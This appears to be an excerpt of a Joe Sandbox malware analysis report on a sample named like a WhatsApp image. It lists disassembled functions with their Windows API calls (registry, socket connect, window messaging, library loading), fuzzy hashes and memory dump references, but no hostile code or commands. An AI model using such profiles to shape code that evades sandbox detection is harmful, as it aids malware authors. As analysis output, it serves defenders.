Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
Instruction ID: a352dd599977aab795ad084c31ddb93d20c4e2588d1582b54e923264a13a2977
Opcode Fuzzy Hash: e9cc9fcb9f5a1ea0fb8dede3c6a7427ba38cf2905918942a9101ea7b40337168
Instruction Fuzzy Hash: 84216071600605ABDB21AF65DC09F9E7BF8AF45720F204A5DF9A1D72D0D770D941CB10

Function 000C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 000C9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000C9683
GetStdHandle.KERNEL32(000000F6), ref: 000C9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 000C96CE

Strings

nul, xrefs: 000C96C9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
Instruction ID: 210b730801592e2fa8617bc7f98779771d1ae6c780bfc627254b7e1508384353
Opcode Fuzzy Hash: 36619ee1571ada4febceb5e9eec42ac29adb198298ae7359daf0474f93280630
Instruction Fuzzy Hash: DA2150716002059BDB209F699C49F9EB7E8AF55734F200A1DF8A1E72D0EBB0D981CB50

Function 000CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000CDB5E
__swprintf.LIBCMT ref: 000CDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0011DC00), ref: 000CDBB5

Strings

%lu, xrefs: 000CDB71

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
Instruction ID: dd12055bc1a89ad6b050324765eabf59177583664265c860d193135bb90ae0f0
Opcode Fuzzy Hash: 5276d80a226c8cd1332b79d3011152efb7fe9e7632021518b2b9b5a3cf7bc679
Instruction Fuzzy Hash: 73218035A00208AFDB10EFA4DD85EEEBBB8EF49704B014069F549E7252DB71EE41DB61

Function 000BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BC84A
Part of subcall function 000BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BC85D
Part of subcall function 000BC82D: GetCurrentThreadId.KERNEL32 ref: 000BC864
Part of subcall function 000BC82D: AttachThreadInput.USER32(00000000), ref: 000BC86B

GetFocus.USER32 ref: 000BCA05

Part of subcall function 000BC876: GetParent.USER32(?), ref: 000BC884

GetClassNameW.USER32(?,?,00000100), ref: 000BCA4E
EnumChildWindows.USER32(?,000BCAC4), ref: 000BCA76
__swprintf.LIBCMT ref: 000BCA90

Strings

%s%d, xrefs: 000BCA8A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
Instruction ID: 961a08fce9707a7a912ea4be4946a7fe67756dcc9d10a34d39d2e4fc89b28764
Opcode Fuzzy Hash: 506dc6d5c42c0d5c1e4f4c6ce0ea3b019c8852451af789016865abf3a9e6d267
Instruction Fuzzy Hash: 3211AC756002096BEB11BFA09C86FEA376DAB44704F048066FA08AA083CBB09945CB71

Function 000E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000E19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 000E1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 000E1B49
CloseHandle.KERNEL32(?), ref: 000E1BBF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 1f975d76103af10b64cd5b6fa132ca409f3b07e88592371dc792ca555f4c730b
Instruction ID: 3b8e201b534806962d2a9b3436a77645081203c369161d9afef82dc4d6fa879d
Opcode Fuzzy Hash: 1f975d76103af10b64cd5b6fa132ca409f3b07e88592371dc792ca555f4c730b
Instruction Fuzzy Hash: 38816F70600205AFDF20EF65C896BEDBBE5AF08720F148459F915AF383D7B5E9419B90

Function 000C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000C1CB4
VariantClear.OLEAUT32(00000013), ref: 000C1D26
VariantClear.OLEAUT32(00000000), ref: 000C1D81
VariantClear.OLEAUT32(?), ref: 000C1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000C1E26

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
Instruction ID: c03d7e7490fa75119ca5b989568870d15f445f9a9b7d7b40999e0f7554bf7fdf
Opcode Fuzzy Hash: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
Instruction Fuzzy Hash: 5C5147B5A00209EFDB14CF58D880EAAB7F8FF4D314B158559E95ADB301E730EA51CBA0

Function 000E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 000E06EE
GetProcAddress.KERNEL32(00000000,?), ref: 000E077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 000E079B
GetProcAddress.KERNEL32(00000000,?), ref: 000E07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 000E07FB

Part of subcall function 0009E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000CA574,?,?,00000000,00000008), ref: 0009E675
Part of subcall function 0009E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000CA574,?,?,00000000,00000008), ref: 0009E699

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: e7ae48a92a47e38b3cdbdc31daf77606f35dcec10b2a458e3dce57288310b911
Instruction ID: 160c77dcaa3a8cd6fb2626e210f87b864a377b468cf81b1efe64f29a9d4b1cd5
Opcode Fuzzy Hash: e7ae48a92a47e38b3cdbdc31daf77606f35dcec10b2a458e3dce57288310b911
Instruction Fuzzy Hash: 5F512775A00245DFCB00EFA8C881DEDB7F5BF58310B04806AE995AB352DB70ED86DB90

Function 000E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2BB5,?,?), ref: 000E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000E2F75
RegCloseKey.ADVAPI32(?,?), ref: 000E2FA1
RegCloseKey.ADVAPI32(00000000), ref: 000E2FAE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: ea424fdfe9a9ac6bfb8d85ae4079a5a5edb077f732e63e3bb8b245c494debb29
Instruction ID: 2be2fd1f9d4a4fb1a13bdaf98c759a7b12c52863961af7a7aded50ce02904226
Opcode Fuzzy Hash: ea424fdfe9a9ac6bfb8d85ae4079a5a5edb077f732e63e3bb8b245c494debb29
Instruction Fuzzy Hash: A2515A71208244AFD714EF64C891EAEB7F9FF88314F04492DF59597292DB70E905CB52

Function 000ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673752fc276fc76782f9c998189d0f8d373f09744f29825c3a66a5ad0c3c113b
Instruction ID: f248a7a50f73bd6c8d680cfbcf22dd063ff75b1b0e8108d053a4fad5bf519c9c
Opcode Fuzzy Hash: 673752fc276fc76782f9c998189d0f8d373f09744f29825c3a66a5ad0c3c113b
Instruction Fuzzy Hash: 0D412839904284BFE764DF69CC44FA97FA9FB09310F150125F859B72E1C772AD42C650

Function 000D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000D12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000D12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000D131C

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000D1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000D1349

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
Instruction ID: 4727a2b1875c027a07382ddc6bbcf338aba22a57ea4d5a308aa55a916cbb8b01
Opcode Fuzzy Hash: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
Instruction Fuzzy Hash: 53411F35600605EFDF01EF64C9819ADBBF5FF08314B148099E946AB362DB31EE41DB51

Function 000BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000BB369
PostMessageW.USER32(?,00000201,00000001), ref: 000BB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000BB41B
PostMessageW.USER32(?,00000202,00000000), ref: 000BB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000BB431

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
Instruction ID: 1ab12f1580632eef55f530a4cff87f64e3b5a5905bc1e4849df5c26e82a480ec
Opcode Fuzzy Hash: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
Instruction Fuzzy Hash: 2E31BA71900219EBDB14CFA8D94DADE3BB5FB04719F104229F961AB2D1C7F09A54CB90

Function 000BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 000BDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000BDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000BDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000BDC52
_wcsstr.LIBCMT ref: 000BDC5C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
Instruction ID: c54d50c8f187e353ad19707740e62b55b0332336676f6ae5e6f933bc7bebea5b
Opcode Fuzzy Hash: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
Instruction Fuzzy Hash: 5521F971204105BBEB255F79AC49EFFBFA8EF45760F10803AF909CA191FAA1DC41E660

Function 000EDE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetWindowLongW.USER32(?,000000F0), ref: 000EDEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000EDED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000EDEEC
GetSystemMetrics.USER32(00000004), ref: 000EDF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,000D3A1E,00000000), ref: 000EDF32

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
Instruction ID: 786aa48ec10be496a41f9ac6f35ca94d3936b206915c4507e3780a8b05a668fb
Opcode Fuzzy Hash: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
Instruction Fuzzy Hash: 0921B071611252AFCB209F7ADC48B6A37E5EB15324F150336F966EAAF0D77098908B80

Function 000BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000BBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBCC2
__itow.LIBCMT ref: 000BBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBD00
__itow.LIBCMT ref: 000BBD11

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
Instruction ID: 97568eb477291c9f8e0ba4804309ae055d7991c0c6c44b67b56e68997ee9e17d
Opcode Fuzzy Hash: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
Instruction Fuzzy Hash: DA21C335600618BFDB20AAA59C46FDE7EA9AF5A710F000424FA45EB182EBF5C94587A1

Function 000C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 000850E6: _wcsncpy.LIBCMT ref: 000850FA

GetFileAttributesW.KERNEL32(?,?,?,?,000C60C3), ref: 000C6369
GetLastError.KERNEL32(?,?,?,000C60C3), ref: 000C6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C6388
_wcsrchr.LIBCMT ref: 000C63AA

Part of subcall function 000C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C63E0

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: a99bef33b4d19d907f2fe05aa3514e111e7db0ae18757821fada1923ad64bf13
Instruction ID: 203bcf183af5212b22dea68d978e6933560bd28f31c1e4e368574d12ca157e05
Opcode Fuzzy Hash: a99bef33b4d19d907f2fe05aa3514e111e7db0ae18757821fada1923ad64bf13
Instruction Fuzzy Hash: D521D8319042555BEF35ABB8AC42FEE23ACAF06360F10046DF145D70C2EBA2DA809A65

Function 000D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000D8BD3
WSAGetLastError.WSOCK32(00000000), ref: 000D8BE2
connect.WSOCK32(00000000,?,00000010), ref: 000D8BFE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
Instruction ID: eb7bbb0934b2fcd90c0a7fe34c61f70585c48c74170393e2b787a330398d1ff5
Opcode Fuzzy Hash: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
Instruction Fuzzy Hash: 792181712002149FDB14AF68DC45FBE77A9EF48714F04845AF95697392CBB4E8418761

Function 000D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000D8441
GetForegroundWindow.USER32 ref: 000D8458
GetDC.USER32(00000000), ref: 000D8494
GetPixel.GDI32(00000000,?,00000003), ref: 000D84A0
ReleaseDC.USER32(00000000,00000003), ref: 000D84DB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
Instruction ID: ba928a16fc51537368ef245d0d8e23b8be226687aee6f5f9c0d4f20362d3194c
Opcode Fuzzy Hash: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
Instruction Fuzzy Hash: C8218175A00204AFD700EFA4D889AAEBBF5EF48301F04C479E85997752DF70AC40DB60

Function 0009AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
SelectObject.GDI32(?,00000000), ref: 0009AFF2
BeginPath.GDI32(?), ref: 0009B009
